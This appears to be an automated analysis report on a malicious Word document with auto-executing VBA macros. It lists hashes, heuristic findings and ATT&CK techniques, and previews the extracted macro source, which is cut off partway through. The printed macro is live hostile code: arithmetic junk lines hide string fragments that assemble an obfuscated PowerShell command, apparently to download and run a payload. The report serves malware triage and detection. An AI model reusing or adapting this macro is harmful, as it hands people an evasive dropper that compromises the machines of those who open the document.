Office (OLE) malware analysis — malicious · 22a55c683ba57773

MALICIOUS

Office (OLE)

104.8 KB Created: 2018-06-25 10:57:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: fae842763c15dffac6043b1d463e3ea6 SHA-1: 5388ae5dcd2add6274eceb9538e133ec90c74f1d SHA-256: 22a55c683ba57773961a7ef7275a2f0dae09575e7c67a9db659d9d092284c575

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA macros. This, combined with the 'OLE_VBA_AUTOOPEN' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' firings, strongly suggests the macro is designed to execute arbitrary commands. The script itself contains obfuscated string concatenations that appear to be assembling commands, likely for downloading and executing a secondary payload.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11352 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11352 bytes
SHA-256: `c8a60216e5e412f0f40cdda647131b4391b702832bb5c56b8c5be477d2c297c4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wTRwNsl" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "tikYaVkZ" Function iZqojCjnNF() On Error Resume Next MOsCvZ = (63109 / CBool(76716) + 20216 + CSng(imlYGt) * (87404 - kBGVi + 94117 - CLng(bwzEz))) rLYEr = CByte(60013 * Tan(72484) / 48449 + CLng(soXcw * 6909 * 34955 * Chr(42247))) rGNpddXs = "He" + "ll " + "." + Chr(40) + " $sHe" + "LLId[1]" + Chr(43) + "$S" + "hEl" + "LiD[13]" + Chr(43) LhTLHY = (83923 / CBool(61373) + 90824 + CSng(UdjjMi) * (82667 - MUPOHz + 67152 - CLng(SwGwI))) aHsQu = CByte(62137 * Tan(7043) / 99848 + CLng(LjvEY * 18307 * 8898 * Chr(20020))) sJqOkYF = "'X'" + Chr(41) + Chr(40) + " -JoI" + "N" + Chr(40) + " '" + "46M110i" + "93n127M" + "55" + "u10" + "0z111" + "y125y3" + "9n101B10" HbFBaz = (49698 / CBool(38830) + 54408 + CSng(GtYwhL) * (5716 - rwnKYM + 13762 - CLng(iMuKz))) nNrjD = CByte(46764 * Tan(62678) / 90685 + CLng(aEFtTm * 76166 * 25371 * Chr(87765))) TmqDC = "4-" + "96i111" + "-105z12" + "6n42z" + "68z111" + "i126f" + "36-93i" hNNFw = (7337 / CBool(86162) + 89932 + CSng(SNZRw) * (86223 - LEAHi + 90630 - CLng(GNGSTn))) rzBpR = CByte(1166 * Tan(49648) / 14149 + CLng(dKdJcd * 1975 * 73722 * Chr(12028))) iTWNJTUH = "111i" + "104n7" + "3n" + "102B99n1" + "11-100" + "z126f49B" + "46u12" + "0n103i7" + "5,55M4" + "5," NaiMl = (82096 / CBool(74368) + 32396 + CSng(splZG) * (10278 - NYchsj + 8232 - CLng(XwBlT))) MUMSar = CByte(15599 * Tan(75580) / 29241 + CLng(ijSOFs * 71842 * 43504 * Chr(8137))) OmshZnsqYdj = "98M126" + "n126" + "B12" + "2i48i3" + "7,37" + "u103n" PcJYI = (64033 / CBool(42946) + 49458 + CSng(ppBzij) * (41238 - GjOTa + 17295 - CLng(CINpDf))) ihSNj = CByte(20025 * Tan(76323) / 20482 + CLng(UizaId * 74055 * 76280 * Chr(66291))) YXTWlbzhVwo = "111" + ",110y121" + "-105" + ",99" + ",1" + "11f1" + "00M10" + "5-111" + "B36y" + "127-10" Tiqpip = (38156 / CBool(61661) + 43149 + CSng(TjWIdL) * (38048 - RwLkvn + 87551 - CLng(biUYVa))) TMjor = CByte(69321 * Tan(46736) / 30099 + CLng(RKZnMq * 93438 * 95927 * Chr(19331))) XucSiPwNbFQ = "0u99-" + "12" + "4f111" + "n120z36," + "97n98u" + "107f" + "120,97n" + "101" + "z124" + "u36f12" + "7u1" WlZij = (5315 / CBool(93139) + 94857 + CSng(kLzdt) * (49526 - wwWcu + 86036 - CLng(jTkNFY))) mWOODV = CByte(89369 * Tan(56423) / 95535 + CLng(umKiTT * 63545 * 62602 * Chr(27284))) RuBmWNlvBk = "07" + "n37n99," + "103y1" + "07B109n" + "111y121," + "37" + "M122n98-" + "101u10" uzbhM = (57477 / CBool(8719) + 85415 + CSng(wpqYd) * (97490 - jPpEHS + 98412 - CLng(hIiCNA))) hrOqm = CByte(92006 * Tan(63303) / 3931 + CLng(QCNzw * 7882 * 26640 * Chr(64079))) hRush = "5B" + "107i1" + "09M" + "107B10" + "2n" + "102f11" + "1,120" + "M115" ikRqJB = (52716 / CBool(1084) + 80760 + CSng(EvCiP) * (88596 - zKmMs + 4549 - CLng(PnFEz))) duAWiP = CByte(73504 * Tan(80973) / 64604 + CLng(PlFjz * 57969 * 28439 * Chr(44573))) iANClDK = "f37" + "-56-62" + "n36f58M5" + "1u" + "36-59" + "f63M3" + "7M" FoEDuT = (74149 / CBool(64960) + 8562 + CSng(WwWBBW) * (18763 - fwzHRR + 95757 - CLng(amVPl))) iGtAY = CByte(82556 * Tan(12156) / 5120 + CLng(ihOLQs * 71033 * 8713 * Chr(19170))) WRIQb = "126M1" + "20,1" + "00f3" + "6i111y1" + "14u1" + "11z" + "74n98M" + "12" + "6z1" + "26z122i" + "48B3" + "7y" iZqojCjnNF = rGNpddXs + sJqOkYF + TmqDC + iTWNJTUH + OmshZnsqYdj + YXTWlbzhVwo + XucSiPwNbFQ + RuBmWNlvBk + hRush + iANClDK + WRIQb jjazzW = (74638 / CBool(10980) + 44394 + CSng(AMppzN) * (31218 - BwSoc + 445 - CLng(aCGhf))) hLbCpH = CByte(13275 * Tan(92650) / 57292 + CLng(ljIwVs * 49257 * 26474 * Chr(6149))) End Function Function CVSObtswfOO() On Error Resume Next dDLVvG = (51296 / CBool(65721) + 45516 + CSng(jYsES) * (1014 - nIFJK + 44755 - CLng(hFTEv))) dsiCLi = CByte(99507 * Tan(11616) / 13174 + CLng(hYYKFM * 83028 * 8794 * Chr(57664))) HQWmtnkkJ = "37" + "n121n11" + "1M12" + "0n1" + "11-1" + "00i99" + "u126i1 ... (truncated)

SHA-256: c8a60216e5e412f0f40cdda647131b4391b702832bb5c56b8c5be477d2c297c4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "wTRwNsl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "tikYaVkZ"
Function iZqojCjnNF()
On Error Resume Next
MOsCvZ = (63109 / CBool(76716) + 20216 + CSng(imlYGt) * (87404 - kBGVi + 94117 - CLng(bwzEz)))
rLYEr = CByte(60013 * Tan(72484) / 48449 + CLng(soXcw * 6909 * 34955 * Chr(42247)))
rGNpddXs = "He" + "ll " + "." + Chr(40) + " $sHe" + "LLId[1]" + Chr(43) + "$S" + "hEl" + "LiD[13]" + Chr(43)
LhTLHY = (83923 / CBool(61373) + 90824 + CSng(UdjjMi) * (82667 - MUPOHz + 67152 - CLng(SwGwI)))
aHsQu = CByte(62137 * Tan(7043) / 99848 + CLng(LjvEY * 18307 * 8898 * Chr(20020)))
sJqOkYF = "'X'" + Chr(41) + Chr(40) + " -JoI" + "N" + Chr(40) + " '" + "46M110i" + "93n127M" + "55" + "u10" + "0z111" + "y125y3" + "9n101B10"
HbFBaz = (49698 / CBool(38830) + 54408 + CSng(GtYwhL) * (5716 - rwnKYM + 13762 - CLng(iMuKz)))
nNrjD = CByte(46764 * Tan(62678) / 90685 + CLng(aEFtTm * 76166 * 25371 * Chr(87765)))
TmqDC = "4-" + "96i111" + "-105z12" + "6n42z" + "68z111" + "i126f" + "36-93i"
hNNFw = (7337 / CBool(86162) + 89932 + CSng(SNZRw) * (86223 - LEAHi + 90630 - CLng(GNGSTn)))
rzBpR = CByte(1166 * Tan(49648) / 14149 + CLng(dKdJcd * 1975 * 73722 * Chr(12028)))
iTWNJTUH = "111i" + "104n7" + "3n" + "102B99n1" + "11-100" + "z126f49B" + "46u12" + "0n103i7" + "5,55M4" + "5,"
NaiMl = (82096 / CBool(74368) + 32396 + CSng(splZG) * (10278 - NYchsj + 8232 - CLng(XwBlT)))
MUMSar = CByte(15599 * Tan(75580) / 29241 + CLng(ijSOFs * 71842 * 43504 * Chr(8137)))
OmshZnsqYdj = "98M126" + "n126" + "B12" + "2i48i3" + "7,37" + "u103n"
PcJYI = (64033 / CBool(42946) + 49458 + CSng(ppBzij) * (41238 - GjOTa + 17295 - CLng(CINpDf)))
ihSNj = CByte(20025 * Tan(76323) / 20482 + CLng(UizaId * 74055 * 76280 * Chr(66291)))
YXTWlbzhVwo = "111" + ",110y121" + "-105" + ",99" + ",1" + "11f1" + "00M10" + "5-111" + "B36y" + "127-10"
Tiqpip = (38156 / CBool(61661) + 43149 + CSng(TjWIdL) * (38048 - RwLkvn + 87551 - CLng(biUYVa)))
TMjor = CByte(69321 * Tan(46736) / 30099 + CLng(RKZnMq * 93438 * 95927 * Chr(19331)))
XucSiPwNbFQ = "0u99-" + "12" + "4f111" + "n120z36," + "97n98u" + "107f" + "120,97n" + "101" + "z124" + "u36f12" + "7u1"
WlZij = (5315 / CBool(93139) + 94857 + CSng(kLzdt) * (49526 - wwWcu + 86036 - CLng(jTkNFY)))
mWOODV = CByte(89369 * Tan(56423) / 95535 + CLng(umKiTT * 63545 * 62602 * Chr(27284)))
RuBmWNlvBk = "07" + "n37n99," + "103y1" + "07B109n" + "111y121," + "37" + "M122n98-" + "101u10"
uzbhM = (57477 / CBool(8719) + 85415 + CSng(wpqYd) * (97490 - jPpEHS + 98412 - CLng(hIiCNA)))
hrOqm = CByte(92006 * Tan(63303) / 3931 + CLng(QCNzw * 7882 * 26640 * Chr(64079)))
hRush = "5B" + "107i1" + "09M" + "107B10" + "2n" + "102f11" + "1,120" + "M115"
ikRqJB = (52716 / CBool(1084) + 80760 + CSng(EvCiP) * (88596 - zKmMs + 4549 - CLng(PnFEz)))
duAWiP = CByte(73504 * Tan(80973) / 64604 + CLng(PlFjz * 57969 * 28439 * Chr(44573)))
iANClDK = "f37" + "-56-62" + "n36f58M5" + "1u" + "36-59" + "f63M3" + "7M"
FoEDuT = (74149 / CBool(64960) + 8562 + CSng(WwWBBW) * (18763 - fwzHRR + 95757 - CLng(amVPl)))
iGtAY = CByte(82556 * Tan(12156) / 5120 + CLng(ihOLQs * 71033 * 8713 * Chr(19170)))
WRIQb = "126M1" + "20,1" + "00f3" + "6i111y1" + "14u1" + "11z" + "74n98M" + "12" + "6z1" + "26z122i" + "48B3" + "7y"
iZqojCjnNF = rGNpddXs + sJqOkYF + TmqDC + iTWNJTUH + OmshZnsqYdj + YXTWlbzhVwo + XucSiPwNbFQ + RuBmWNlvBk + hRush + iANClDK + WRIQb
jjazzW = (74638 / CBool(10980) + 44394 + CSng(AMppzN) * (31218 - BwSoc + 445 - CLng(aCGhf)))
hLbCpH = CByte(13275 * Tan(92650) / 57292 + CLng(ljIwVs * 49257 * 26474 * Chr(6149)))
End Function
Function CVSObtswfOO()
On Error Resume Next
dDLVvG = (51296 / CBool(65721) + 45516 + CSng(jYsES) * (1014 - nIFJK + 44755 - CLng(hFTEv)))
dsiCLi = CByte(99507 * Tan(11616) / 13174 + CLng(hYYKFM * 83028 * 8794 * Chr(57664)))
HQWmtnkkJ = "37" + "n121n11" + "1M12" + "0n1" + "11-1" + "00i99" + "u126i1
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.